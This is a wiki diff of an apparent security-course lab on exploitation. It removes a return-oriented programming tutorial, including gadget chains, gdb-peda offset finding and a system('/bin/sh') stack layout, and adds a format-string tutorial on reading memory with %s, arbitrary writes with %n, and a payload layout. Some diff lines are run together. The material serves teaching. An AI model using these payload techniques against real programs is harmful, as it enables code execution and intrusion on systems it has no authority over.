 -The original ret (in the normal code flow) will pop RET+0x00 off the stack and jump to it. When it gets popped the stack is automatically increased by 4 (on to the next value). The instruction at ''0x80482dd'' is another ''ret'' which does the same thing as before. This goes on until another address is popped off the stack that is not a ''ret''. +This is a partial dump of the stack memory, starting from the current bottom of the stack towards the top (assuming the stack grows towards the low addresses). Depending on the size of the format string buffer and the size of the output buffer, you can reconstruct larger or smaller parts of the stack memory by using this technique. In some cases you can even retrieve the entire stack memory. 
 +A stack dump gives important information about the program flow and local function variables and may be very helpful for finding the correct offsets for a successful exploitation. 
 +==== Viewing memory at any location  ==== 
 +It is also possible to peek at memory locations other than the stack. To do this we have to get the format function to display memory from an address we supply. 
 +This poses two problems: 
 +  * First, we have to find a format parameter that takes an address (by reference) as its stack parameter and displays memory from there. 
 +  * Second, we have to supply that address. 
 +We are lucky in the first case, since the '%s' parameter does just that: it displays memory (usually an ASCIIZ string) from a stack-supplied address. 
 +So the remaining problem is how to get that address onto the stack, in the right place.
  
-That payload is not the only option. We don't really care which ''ret'' we pick. The payload could very well look like this: 
-<code> 
-RET + 0x00:   0x80482dd 
-RET + 0x04:   0x804837a 
-RET + 0x08:   0x80483b7 
-RET + 0x0c:   0x8048437 
-RET + 0x10:   0x80484c6 
-..... 
-</code> 
-Notice the addresses are different but because they all point to a ''ret'' instruction they will all have the same net effect on the code flow. 
  
 -<note warning> +Our format string is usually located on the stack itself, so we already have nearly full control over the space where the format string lies. 
 -Take a moment to fully understand what is happening here. Run your own program and step through the payload to see this in action before proceeding. +The format function internally maintains a pointer to the stack location of the current format parameter.  
 -Follow along using this skeleton to generate the payloads. +If we can get this pointer to point into memory we control, we can supply an address to the '%s' parameter.  
 +<note important> 
 +To re-create the following attack, place the string passed to ''printf'' in a local buffer. The following examples use a string literal to keep things simple, but at compile time a literal is placed in the ''.rodata'' section, so the desired address will not be on the stack and cannot be used (this is also true for the dummy parameters).
 </note> </note>
 -<file python skel.py> +To modify the stack pointer we can simply use dummy parameters that will 'dig' up the stack by printing junk: 
 -#!/usr/bin/python +<code C> 
 -import struct, sys +printf ("AAA0AAA1_%08x.%08x.%08x.%08x.%08x"); 
 +</code> 
 +The '%08x' parameters advance the internal stack pointer of the format function towards the top of the stack.  
 +After enough of these parameters, the stack pointer points into our memory: the format string itself.  
 +The format function always runs in the lowest stack frame, so if our buffer lies on the stack at all, it certainly lies above the current stack pointer.  
 +If we choose the number of '%08x' parameters correctly, we can display memory from an arbitrary address by appending '%s' to our string.
  
 -def dw(i): +In our case the address is illegal and would be 'AAA0'. Let's replace it with a real one. 
 - return struct.pack("<I", i) +Example:
  
-#TODO update count for your prog 
-pad_count_to_ret = 100 
-payload = "X" * pad_count_to_ret 
- 
-#TODO figure out the rop chain 
-payload += dw(0xcafebeef) 
-payload += dw(0xdeadc0de) 
- 
- 
-sys.stdout.write(payload) 
- 
-</file> 
- 
- 
-==== Gadgets & ROP chains 
-Now that we have a sort of neutral primitive equivalent to a NOP let's actually do something useful. 
-The building blocks of ROP payloads are called gadgets. These are blocks of instructions that end with a 'ret' instruction. 
-Here are some 'gadgets' from the previous program: 
 <code> <code>
-0x8048443: pop ebp; ret +address = 0x08480110 
 -0x80484a7: pop edi; pop ebp; ret +address (encoded as a 32-bit little-endian string): "\x10\x01\x48\x08"
-0x8048441: mov ebp,esp; pop ebp; ret +
-0x80482da: pop eax; pop ebx; leave; ret +
-0x80484c3pop ecx; pop ebx; leave; ret+
 </code> </code>
  
 -By carefully stitching such gadgets on the stack we can bring code execution to almost any context we want. +<code C> 
-As an example let's say we would like to load 0x41424344 into eax and 0x61626364 into ebx. The payload should look like: +printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
-<code> +
-RET + 0x00:   0x80482da  (pop eaxpop ebx; leave; ret) +
-RET + 0x04:   0x41424344 +
-RET + 0x08:   0x61626364 +
-RET + 0x0c:   0xAABBCCDD ???+
 </code> </code>
-  * First the ret addr is popped from the stack and execution goes there. 
-  * At ''pop eax'' 0x41424344 is loaded into eax and the stack is increased 
-  * At ''pop ebx'' 0x61626364 is loaded into ebx and the stack is increased again 
-  * At ''leave'' two things actually happen: "mov esp, ebp; pop ebp". So the stack frame is decreased to the previous one (pointed by ebp) and ebp is updated to the one before that. So esp will now be the old ebp+4 
-  * At ''ret'' code flow will go to the instruction pointed to by ebp+4. This implies that execution will __not__ go to 0xAABBCCDD but to some other address that may or may not be in our control (depending on how much we can overflow on the stack). If it is in our control we can overwrite that address with the rest of the ROP chain. 
  
-We have now seen how gadgets can be useful if we want the CPU to achieve certain state. This is particularly useful on other architectures such as ARM and x86_64 where functions do not take parameters from the stack but from registers. +This will dump memory from 0x08480110 until a NULL byte is reached. By increasing the memory address dynamically we can map out the entire process space.  
 -As an example, if we want to call f1(0xAB, 0xCD, 0xEF) on x86_64 we first need to know the calling convention for the first three parameters: +It is even possible to create a coredump-like image of the remote process and to reconstruct a binary from it. It is also helpful for finding the cause of unsuccessful exploitation attempts.
-  * 1st param: RDI +
-  * 2nd param: RSI +
-  * 3rd param: RDX +
-Next we would need gadgets for eachLet's assume these 2 scenarios: +
-Scenario 1: +
-<code> +
-0x400124:  pop rdi; pop rsi; ret +
-0x400235:  pop rdx; ret +
-0x400440:  f1()+
  
 -Payload: +If we cannot reach the exact format string boundary by using 4-byte pops ('%08x'), we have to pad the format string by prepending one, two or three junk characters.  
 -RET + 0x00:   0x400124 +This is analogous to the alignment in buffer overflow exploits. 
-RET + 0x08:   val of RDI (0xAB+ 
-RET + 0x10:   val of RSI (0xCD+==== Exploitation - through pure format strings ==== 
 -RET + 0x18:   0x400235 +Our goal in the case of exploitation is to control the instruction pointer, i.e. we want to extend our very limited control (the ability to control the behaviour of the format function) to real execution control, that is, executing our own machine code. 
-RET + 0x20:   val of RDX +Let's take a look at the following code: 
-RET + 0x28:   f1+<code C> 
 +{
 +    char buffer[512];
 +    snprintf (buffer, sizeof (buffer), user);   /* user-controlled format string */
 +    buffer[sizeof (buffer) - 1] = '\0';
 +}
 </code> </code>
 +In the code above it is not possible to enlarge our buffer by inserting some kind of 'stretching' format parameter, because the program uses the bounded ''snprintf'' function to ensure we cannot exceed the buffer.
 +At first it may look as if we cannot do many useful things, except crashing the program and inspecting some memory.
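
For contrast, here is a minimal sketch of the same copy written so that the user data is never interpreted as a format string. The helper name ''copy_user_input'' is hypothetical and not part of the session archive; the only point is the constant "%s" format.

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Hypothetical helper: copies user input into dst without ever
 * interpreting it as a format string. Because the format is the
 * constant "%s", any '%' characters inside user are plain data.
 * Returns what snprintf returns: the length of the full string.
 */
int copy_user_input(char *dst, size_t dst_size, const char *user)
{
    assert(dst != NULL && user != NULL && dst_size > 0);
    return snprintf(dst, dst_size, "%s", user);
}
```

Passing a string such as "%08x.%n" through this helper should simply copy those seven characters; no stack values are read and nothing is written through '%n'.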
  
 -Scenario 2: +Let's recall the format parameters mentioned earlier. There is the '%n' parameter, which writes the number of bytes already printed into a variable of our choice.  
 -<code> +The address of the variable is given to the format function by placing an integer pointer as a parameter on the stack. 
 -0x400125:  pop rdi; ret +Example: 
 -0x400252:  pop rsi; ret +<code C> 
 -0x400235:  pop rdx; ret +int i; 
 -0x400440:  f1() +printf ("foobar%n\n", (int *) &i); 
- +printf ("i = %d\n", i);
-Payload: +
-RET + 0x00:   0x400125 +
-RET + 0x08:   val of RDI (0xAB+
-RET + 0x10:   0x400252 +
-RET + 0x18:   val of RSI (0xCD) +
-RET + 0x20:   0x400235  +
-RET + 0x28:   val of RDX +
-RET + 0x30:   f1+
 </code> </code>
 -Notice that because the architecture is 64 bits wide, the values on the stack are not dwords but qwords (quad words: 8 bytes wide) +This would print "i = 6". With the same method we used above to print memory from arbitrary addresses, we can write to arbitrary locations:
- +
- +
-The second use of gadgets is to clear the stackRemember the issue we had in the **Motivation** section? Let's solve it using gadgets. +
-We need to call f1(0xAB0xCD) and then f2(0xEF, 0x42). Our initial solution was:+
 <code> <code>
-RET + 0x00:   addr of f1 +"AAA0_%08x.%08x.%08x.%08x.%08x.%n"
-RET + 0x04:   addr of f2 (return address after f1 finishes) +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2) +
-RET + 0x10:   0x42 (param2 of f2) +
 </code> </code>
  
 -The problem is that those parameters of f1 are getting in the way of calling f2. We need to find a **pop pop ret** gadget. The actual registers are not important. +With each '%08x' parameter we increase the internal stack pointer of the format function by four bytes. 
 - +We do this until this pointer points to the beginning of our format string (to 'AAA0'). This works because our format string is usually located on the stack, above the format function's own stack frame.  
 -<code> +The '%n' writes to the address 0x30414141, which is represented by the string "AAA0". Normally this would crash the program, since this address is not mapped.  
 -RET + 0x00:   addr of f1 +But if we supply a valid, mapped and writable address, this works and we overwrite four bytes (sizeof (int)) at that address:
-RET + 0x04:   addr of (pop eaxpop ebxret)  +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1) +
-RET + 0x10:   addr of f2 +
-RET + 0x14:   JUNK +
-RET + 0x18:   0xEF (param1 of f2) +
-RET + 0x1c:   0x42 (param2 of f2)  +
-</code> +
-Now we can even call the next function f3 if we repeat the trick:+
 <code> <code>
-RET + 0x00:   addr of f1 +"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
-RET + 0x04:   addr of (pop eax, pop ebx, ret)  +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1) +
-RET + 0x10:   addr of f2 +
-RET + 0x14:   addr of (pop eax, pop ebx, ret)  +
-RET + 0x18:   0xEF (param1 of f2) +
-RET + 0x1c:   0x42 (param2 of f2)  +
-RET + 0x20:   addr of f3+
 </code> </code>
  
 +The format string above will overwrite four bytes at 0xbfffc8c0 with a small integer number. 
 +We have reached one of our goals: we can write to arbitrary addresses. We cannot control the number we are writing yet, but this will change.
  
 -=== Some useful ninja tricks +The number we are writing (the count of characters written by the format function) depends on the format string.  
 - +Since we control the format string, we can at least influence this counter by writing more or fewer bytes: 
 -==== Memory spraying +<code C> 
 -Let's take the following prog: +int a; 
 -<code c> +printf ("%10u%n", 7350, &a); 
 -int main() +/* a == 10 */ 
 -{ +
 -        int x,z; +printf ("%150u%n", 7350, &a); 
-        char a,b,c; +/* a == 150 */
-        char buf[23]+
-        read(0buf100); +
- +
-        return 0; +
-}+
 </code> </code>
 +By using a dummy parameter '%nu' we are able to control the counter written by '%n', at least a bit. 
 +But for writing large numbers, such as addresses, this is not sufficient, so we have to find a way to write arbitrary data.
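
The effect of the field width on the counter can be checked with a small sketch. The helper name ''counter_after_padding'' is hypothetical, and the format string is a literal, so this is the legitimate use of '%n' rather than an attack. It assumes a C library that honours '%n' (some hardened or non-POSIX libraries disable it).

```c
#include <assert.h>
#include <stdio.h>

/*
 * Returns the value that '%n' stores after printing 7350 with the
 * given minimum field width. '%*u' takes the width from the argument
 * list, so one function covers the "%10u%n" and "%150u%n" cases.
 */
int counter_after_padding(int width)
{
    char out[512];
    int count = -1;

    assert(width >= 0 && width < (int)sizeof(out));
    snprintf(out, sizeof(out), "%*u%n", width, 7350u, &count);
    return count;
}
```

Note that a width smaller than the number of digits does not truncate the output: with a width of 2 the counter should still be 4, because 7350 needs four characters.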
  
 -A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need ? +An integer number on the x86 architecture is stored in four bytes in little-endian order, the least significant byte being the first in memory. 
 -There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly. +So a number like 0x0000014c is stored in memory as: "\x4c\x01\x00\x00".
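
The byte order can be made explicit with a short sketch. The function name ''encode_le32'' is an assumption made for illustration; it produces the same byte sequence that has to be placed in the format string when an address is supplied.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Writes the four bytes of value into out in little-endian order:
 * out[0] receives the least significant byte, out[3] the most
 * significant one. The result does not depend on the host byte order.
 */
void encode_le32(uint32_t value, unsigned char out[4])
{
    assert(out != NULL);
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)((value >> (8 * i)) & 0xffu);
}
```

Encoding 0x0000014c this way yields the bytes 4c 01 00 00, and encoding 0x08480110 yields 10 01 48 08.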
  
 -A [[ https://en.wikipedia.org/wiki/De_Bruijn_sequence | De Bruijn sequence ]] is a string of symbols out of a given alphabet  in which each consecutive K symbols only appear once in the whole string. If we can construct such a string out of printable characters then we only need to know the Segmentation Fault address. Converting it back to 4 bytes and searching for it in the initial string will give us the exact offset to the return address. +For the counter in the format function we can control the least significant byte (the first byte stored in memory) by using dummy '%nu' parameters to modify it. 
 - +Example: 
 -Peda can help you do this. Here's how: +<code C> 
 -<code bash> +unsigned char foo[4]; 
-gdb-peda$ help pattern_create  +printf ("%64u%n", 7350, (int *) foo);
-Generate a cyclic pattern +
-Usage: +
-    pattern_create size [file+
- +
-gdb-peda$ pattern_create 100 +
-'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl' +
- +
-gdb-peda$ help pattern_offset  +
-Search for offset of a value in cyclic pattern +
-Usage: +
-    pattern_offset value +
- +
-gdb-peda$ pattern_offset AA8A +
-AA8A found at offset: 76+
 </code> </code>
  
 -Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised: +When the printf function returns, foo[0] contains '\x40', which is equal to 64, the number we used to increase the counter.
-<code bash> +
-# gdb -q ./a +
-Reading symbols from ./a...(no debugging symbols found)...done. +
-gdb-peda$ pattern_create 200 +
-'AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A' +
-gdb-peda$ run +
-AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A +
- +
-Program received signal SIGSEGVSegmentation fault. +
-[----------------------------------registers-----------------------------------] +
-EAX: 0x0  +
-EBX: 0xf7f97e54 --> 0x1a6d5c  +
-ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-EDX: 0x64 ('d'+
-ESI: 0x0  +
-EDI: 0x0  +
-EBP: 0x41334141 ('AA3A'+
-ESP: 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-EIP: 0x41414541 ('AEAA'+
-EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) +
-[-------------------------------------code-------------------------------------] +
-Invalid $PC address: 0x41414541 +
-[------------------------------------stack-------------------------------------] +
-0000| 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0004| 0xffffcd74 ("AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0008| 0xffffcd78 ("AfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0012| 0xffffcd7c ("5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0016| 0xffffcd80 ("AAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0020| 0xffffcd84 ("A6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0024| 0xffffcd88 ("HAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0028| 0xffffcd8c ("AA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0032| 0xffffcd90 ("AIAAiAA8AAJAAjAA9AAKAAkAALAAl"+
-0036| 0xffffcd94 ("iAA8AAJAAjAA9AAKAAkAALAAl"+
-0040| 0xffffcd98 ("AAJAAjAA9AAKAAkAALAAl"+
-0044| 0xffffcd9c ("AjAA9AAKAAkAALAAl"+
-0048| 0xffffcda0 ("9AAKAAkAALAAl"+
-0052| 0xffffcda4 ("AAkAALAAl"+
-0056| 0xffffcda8 ("ALAAl"+
-0060| 0xffffcdac --> 0x6c ('l'+
- +
-[------------------------------------------------------------------------------] +
-Legend: codedatarodata, value +
-Stopped reason: SIGSEGV +
-0x41414541 in ?? () +
- +
- +
- +
-gdb-peda$ pattern_search  +
-Registers contain pattern buffer: +
-EIP+0 found at offset: 35 +
-EBP+0 found at offset: 31 +
-Registers point to pattern buffer: +
-[ECX] --> offset 0 - size ~100 +
-[ESP] --> offset 39 - size ~61 +
-Pattern buffer found at: +
-0xffffcd49 : offset    0 - size  100 ($sp + -0x27 [-10 dwords]) +
-0xffffd1c6 : offset 23424 - size    4 ($sp + 0x456 [277 dwords]) +
-0xffffd1d8 : offset 22930 - size    4 ($sp + 0x468 [282 dwords]) +
-0xffffd276 : offset 48535 - size    4 ($sp + 0x506 [321 dwords]) +
-References to pattern buffer found at: +
-0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords]) +
-0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords])+
  
 +But for an address, there are four bytes that we have to control completely. If we are unable to write four bytes at once, we can try to write one byte at a time, four times in a row. 
 +On most CISC architectures it is possible to write to unaligned arbitrary addresses. This can be used to write to the second least significant byte of the memory where the address is stored.
 +This would look as follows:
 +<code C>
 +unsigned char canary[5];
 +unsigned char foo[4];
 +memset (foo, 0, sizeof (foo));
 +/* 0 * before */ strcpy (canary, "AAAA");
 +/* 1 */ printf ("%16u%n", 7350, (int *) &foo[0]);
 +/* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]);
 +/* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]);
 +/* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]);
 +/* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1],
 +foo[2], foo[3]);
 +printf ("canary: %02x%02x%02x%02x\n", canary[0],
 +canary[1], canary[2], canary[3]);
 +</code>
 +This returns the output "10204080" and "canary: 00000041". We overwrite four times the least significant byte of an integer we point to. 
 +By increasing the pointer each time, the least significant byte moves through the memory we want to write to, and allows us to store completely arbitrary data.
 +As you can see in the first row of the following figure, none of the eight bytes has been touched yet by our overwrite code. 
 +From the second row on we trigger four overwrites, shifted by one byte to the right for every step. 
 +The last row shows the final desired state: we overwrote all four bytes of our foo array, but while doing so, we destroyed three bytes of the canary array. 
 +We included the canary array just to see that we are overwriting memory we do not want to.
 +{{ :session:4-stage-overwrite.png?direct&350 |}}
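
The four overlapping stores can also be replayed in a small simulation that avoids unaligned pointer casts. This is only a sketch: ''store_le32'' and ''staged_overwrite'' are hypothetical names, and each '%n' is modelled as a 4-byte little-endian store of the counter value, which is what happens on x86.

```c
#include <assert.h>
#include <stddef.h>

/* Emulates the 4-byte little-endian store that '%n' performs on x86. */
static void store_le32(unsigned char *dst, unsigned int value)
{
    for (int i = 0; i < 4; i++)
        dst[i] = (unsigned char)((value >> (8 * i)) & 0xffu);
}

/*
 * mem[0..3] stands in for foo, mem[4..7] for canary.
 * counters[k] is the value of the output counter when the k-th '%n'
 * fires; the k-th store starts at mem[k], one byte further along
 * than the previous one.
 */
void staged_overwrite(unsigned char mem[8], const unsigned int counters[4])
{
    assert(mem != NULL && counters != NULL);
    for (int k = 0; k < 4; k++)
        store_le32(&mem[k], counters[k]);
}
```

Starting from four zero bytes followed by "AAAA" and using the counters 16, 32, 64 and 128, the simulated memory should end up as 10 20 40 80 00 00 00 41, which matches the "10204080" and "canary: 00000041" output.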
 +Although this method looks complex, it can be used to overwrite arbitrary data at arbitrary addresses. 
 +For explanation we have only used one write per format string until now, but it is also possible to write multiple times within one format string:
 +<code C>
 +strcpy (canary, "AAAA");
 +printf ("%16u%n%16u%n%32u%n%64u%n",
 +        1, (int *) &foo[0], 1, (int *) &foo[1],
 +        1, (int *) &foo[2], 1, (int *) &foo[3]);
 +printf ("%02x%02x%02x%02x\n", foo[0], foo[1],
 +        foo[2], foo[3]);
 +printf ("canary: %02x%02x%02x%02x\n", canary[0],
 +        canary[1], canary[2], canary[3]);
 </code> </code>
  
 +We use the '1' parameters as dummy arguments to our '%u' paddings.  Also, the padding has changed, since the counter of the characters is already at 16 when we want to write 32. 
 +So we only have to add 16 characters instead of 32 to it, to get the results we desire.
 +This was a special case, in which all the bytes increased throughout the writes. But we could also write ''80 40 20 10'' with only a minor modification.
  
-==== Vulnerable function identification +Since we write integer numbers and the order is little endian, only the least significant byte is important in the writes.  
 -As you can see from above, the base pointer gets trashed so backtracing is not possible +By using counters of 0x80, 0x140, 0x220 and 0x310 characters respectively when "%n" is triggered, we can construct the desired string.  
 -<code bash> +The code to calculate the desired number-of-written-chars counter is this: 
 -gdb-peda$ bt +<code C> 
 -#0  0x41414541 in ?? () +write_byte += 0x100; 
 -#1  0x34414165 in ?? () +already_written %= 0x100; 
 -#2  0x41464141 in ?? () +padding = (write_byte - already_written) % 0x100; 
 -#3  0x41416641 in ?? () +if (padding < 10) 
 +    padding += 0x100;
 </code> </code>
-If this program was larger you wouldn't know which "ret" is the last one executed before jumping into the payload. 
-You can set a breakpoint on all declared functions (if the program has not been stripped) using **rbreak** and then ignoring them: 
-<code bash> 
-gdb-peda$ rbreak  
-Breakpoint 1 at 0x80482d4 
-<function, no debug info> _init; 
-Breakpoint 2 at 0x8048310 
-<function, no debug info> read@plt; 
-Breakpoint 3 at 0x8048320 
-<function, no debug info> __gmon_start__@plt; 
-Breakpoint 4 at 0x8048330 
-<function, no debug info> __libc_start_main@plt; 
-Breakpoint 5 at 0x8048340 
-<function, no debug info> _start; 
-Breakpoint 6 at 0x8048370 
-<function, no debug info> __x86.get_pc_thunk.bx; 
-Breakpoint 7 at 0x804843f 
-<function, no debug info> main; 
-Breakpoint 8 at 0x8048470 
-<function, no debug info> __libc_csu_init; 
-Breakpoint 9 at 0x80484e0 
-<function, no debug info> __libc_csu_fini; 
-Breakpoint 10 at 0x80484e4 
-<function, no debug info> _fini; 
  
 +Where 'write_byte' is the byte we want to create, 'already_written' is the current counter of written bytes that the format function maintains, and 'padding' is the number of bytes by which we have to increase the counter.
 +Example:
 +<code C>
 +write_byte = 0x7f;
 +already_written = 30;
 +write_byte += 0x100; /* write_byte is 0x17f now */
 +already_written %= 0x100; /* already_written is 30 */
  
 -gdb-peda$ commands +/* afterwards padding is 97 (= 0x61) */ 
 -Type commands for breakpoint(s) 1-10, one per line. +padding = (write_byte - already_written) % 0x100; 
 -End with a line saying just "end". +if (padding < 10) 
->continue +    padding += 0x100;
->end +
- +
- +
-gdb-peda$ run +
-Starting program: /ctf/Hexcellents/summerschool2014/lab_material/session-12/tut1/ +
-warning: the debug information found in "/usr/lib64/debug/lib64/ld-2.17.so.debug" does not match "/lib/ld-linux.so.2" (CRC mismatch). +
- +
-warning: Could not load shared library symbols for linux-gate.so.1. +
-Do you need "set solib-search-path" or "set sysroot"? +
- +
-Breakpoint 4, 0x08048330 in __libc_start_main@plt (+
- +
-Breakpoint 8, 0x08048470 in __libc_csu_init () +
- +
-Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () +
- +
-Breakpoint 1, 0x080482d4 in _init () +
- +
-Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () +
- +
-Breakpoint 7, 0x0804843f in main () +
- +
-Breakpoint 2, 0x08048310 in read@plt () +
- +
-AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7 +
- +
-Program received signal SIGSEGV, Segmentation fault. +
-0x41414541 in ?? ()+
 </code> </code>
  
 +Now a format string of "%97u" would increase the '%n' counter so that its least significant byte equals 'write_byte'. 
 +The final check whether the padding is below ten deserves some attention. A simple integer output such as "%u" can generate a string of up to ten characters, depending on the integer it outputs.
 +If the output needs more characters than the width we specify, for example printing '1000' with "%2u", the width is ignored so that no meaningful output is lost. 
 +By ensuring our padding is never smaller than 10, we keep an accurate value of 'already_written', the counter the format function maintains, since we always write exactly as many output bytes as specified by the width in the format parameter.
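
The padding rule can be wrapped in a function to make it easier to experiment with. This is a sketch under the assumptions of the text above (32-bit writes, only the least significant byte matters); the name ''padding_for_byte'' is hypothetical.

```c
#include <assert.h>

/*
 * Returns the field width to use in '%<width>u' so that, after the
 * padding is printed, the least significant byte of the output
 * counter equals write_byte. already_written is the counter value
 * before the padding. Widths below 10 are bumped by 0x100 so that
 * the width, not the printed integer, determines the output length.
 */
unsigned int padding_for_byte(unsigned int write_byte,
                              unsigned int already_written)
{
    unsigned int padding;

    assert(write_byte <= 0xff);
    write_byte += 0x100;
    already_written %= 0x100;
    padding = (write_byte - already_written) % 0x100;
    if (padding < 10)
        padding += 0x100;
    return padding;
}
```

For the worked example (write_byte 0x7f, 30 bytes already written) this gives 97. Chaining it for the bytes 80 40 20 10 from a counter of zero gives widths 128, 192, 224 and 240, so the counter passes through 0x80, 0x140, 0x220 and 0x310.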
  
-==== ROP payload debugging +==== A general method to exploit format strings vulnerabilities ==== 
-When you know what the offending function is, disassemble it and break on "ret" +The only remaining thing to exploit such vulnerabilities in a hands-on practical way is to put the arguments into the right order on the stack and use a stackpop sequence to increase the stack pointer.  
 -<code bash> +It should look like: 
-gdb-peda$ pdis main +<code> 
-Dump of assembler code for function main: +<stackpop><dummy-addr-pair * 4><write-code>
-   0x0804843c <+0>: push   ebp +
-   0x0804843d <+1>: mov    ebp,esp +
-   0x0804843f <+3>: and    esp,0xfffffff0 +
-   0x08048442 <+6>: sub    esp,0x30 +
-   0x08048445 <+9>: mov    DWORD PTR [esp+0x8],0x64 +
-   0x0804844d <+17>: lea    eax,[esp+0x19] +
-   0x08048451 <+21>: mov    DWORD PTR [esp+0x4],eax +
-   0x08048455 <+25>: mov    DWORD PTR [esp],0x0 +
-   0x0804845c <+32>: call   0x8048310 <read@plt> +
-   0x08048461 <+37>: mov    eax,0x0 +
-   0x08048466 <+42>: leave   +
-   0x08048467 <+43>: ret     +
-End of assembler dump+
-gdb-peda$ b *0x08048467 +
-Breakpoint 1 at 0x8048467 +
- +
- +
-AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA +
-[----------------------------------registers-----------------------------------] +
-EAX0x0  +
-EBX: 0xf7f97e54 --> 0x1a6d5c  +
-ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA\n\300\317\377\367\034"+
-EDX: 0x64 ('d'+
-ESI: 0x0  +
-EDI: 0x0  +
-EBP: 0x41334141 ('AA3A'+
-ESP: 0xffffcd6c ("AEAAeAA4AAFAAfA\n\300\317\377\367\034"+
-EIP: 0x8048467 (<main+43>: ret) +
-EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) +
-[-------------------------------------code-------------------------------------] +
-   0x8048445 <main+9>: mov    DWORD PTR [esp+0x8],0x64 +
-   0x804844d <main+17>: lea    eax,[esp+0x19] +
-   0x8048451 <main+21>: mov    DWORD PTR [esp+0x4],eax +
-   0x8048455 <main+25>: mov    DWORD PTR [esp],0x0 +
-   0x804845c <main+32>: call   0x8048310 <read@plt> +
-   0x8048461 <main+37>: mov    eax,0x0 +
-   0x8048466 <main+42>: leave   +
-=> 0x8048467 <main+43>: ret     +
-   0x8048468: xchg   ax,ax +
-   0x804846a: xchg   ax,ax +
-   0x804846c: xchg   ax,ax +
-   0x804846e: xchg   ax,ax +
-   0x8048470 <__libc_csu_init>: push   ebp +
-   0x8048471 <__libc_csu_init+1>: push   edi +
-   0x8048472 <__libc_csu_init+2>: xor    edi,edi +
-   0x8048474 <__libc_csu_init+4>: push   esi +
-[------------------------------------stack-------------------------------------] +
-0000| 0xffffcd6c --> 0xf7e333e0 (<system>: sub    esp,0x1c) +
-0004| 0xffffcd70 --> 0x80484cf (<__libc_csu_init+95>: pop    ebp) +
-0008| 0xffffcd74 --> 0xf7f56be6 ("/bin/sh"+
-0012| 0xffffcd78 --> 0xf7e25c00 (<exit>: push   ebx) +
- +
- +
-gdb-peda$ patto AEAAeAA4AAFAAfA +
-AEAAeAA4AAFAAfA found at offset: 35+
 </code> </code>
 +Where: 
 + * **stackpop** The sequence of stack popping parameters that increase the stack pointer. Once the stackpop has been processed, the format function internal stack pointer points to the beginning of the dummy-addr-pair strings.
 + * **dummy-addr-pair** Four pairs of dummy integer values and addresses to write to. The addresses are increasing by one with each pair, the dummy integer value can be anything that does not contain NULL bytes.
 + * **write-code** The part of the format string that actually does the writing to the memory, by using '%nu%n' pairs, where n is greater than 10. The first part is used to increase or overflow the least significant byte of the format function internal bytes-written counter, and the '%n' is used to write this counter to the addresses that are within the dummy-addr-pair part of the string.
  
